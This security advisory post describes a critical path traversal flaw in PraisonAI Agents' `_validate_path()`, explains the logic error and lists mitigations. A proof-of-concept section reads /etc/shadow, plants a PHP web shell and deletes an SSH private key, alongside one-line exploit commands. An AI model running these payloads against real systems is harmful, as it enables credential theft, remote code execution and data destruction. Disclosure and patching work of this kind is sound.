Listen to this Post
The vulnerability works due to a logical flaw in the `_validate_path()` method. The function first calls `os.path.normpath()` on the user-supplied filepath, which collapses all `..` sequences (e.g., `/tmp/../etc/passwd` becomes /etc/passwd). After normalization, it checks if the string `’..’` exists in the normalized path. Because `normpath()` has already removed all `..` sequences, this check always returns false. Thus, any path traversal attempt passes validation. Additionally, the function does not resolve symbolic links, allowing an attacker to bypass restrictions if they can control a symlink pointing to a sensitive file. The vulnerable code resides in `src/praisonai-agents/praisonaiagents/tools/file_tools.py` lines 42-49. An attacker can read, write, or delete arbitrary files by supplying paths like /tmp/../etc/passwd. The severity is critical with CVSS 9.2, as no authentication or user interaction is required, and full file system access is achievable.
dailycve form:
Platform: PraisonAI Agents
Version: Unspecified (all)
Vulnerability: Path Traversal
Severity: Critical
date: 2026-04-07
Prediction: 2026-04-21
What Undercode Say:
Check if vulnerable file exists
grep -n "_validate_path" src/praisonai-agents/praisonaiagents/tools/file_tools.py
Simulate the vulnerable check
python3 -c "from praisonaiagents.tools.file_tools import FileTools; print(FileTools._validate_path('/tmp/../etc/passwd'))"
Exploit read_file
python3 -c "from praisonaiagents.tools.file_tools import FileTools; print(FileTools.read_file('/tmp/../etc/passwd'))"
Exploit:
poc.py
from praisonaiagents.tools.file_tools import FileTools
Read sensitive file
print(FileTools.read_file('/tmp/../etc/shadow'))
Write arbitrary file
print(FileTools.write_file('/tmp/../var/www/html/shell.php', '<?php system($_GET["cmd"]); ?>'))
Delete file
print(FileTools.delete_file('/tmp/../home/user/.ssh/id_rsa'))
Protection from this CVE:
- Patch by moving the `’..’` check before calling
os.path.normpath(), e.g.,if '..' in filepath: raise ValueError. - Use `os.path.realpath()` instead of `abspath()` to resolve symlinks.
- Implement an allowlist of allowed base directories (e.g., using
os.path.commonpath). - Apply vendor patch as soon as released (predicted 2026-04-21).
Impact:
- Complete file system read access (e.g.,
/etc/passwd,/etc/shadow, SSH keys, configuration files). - Unauthorized write access leading to remote code execution (e.g., writing web shells or cron jobs).
- Deletion of critical files causing denial of service.
- Data breach and privilege escalation via reading application secrets.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

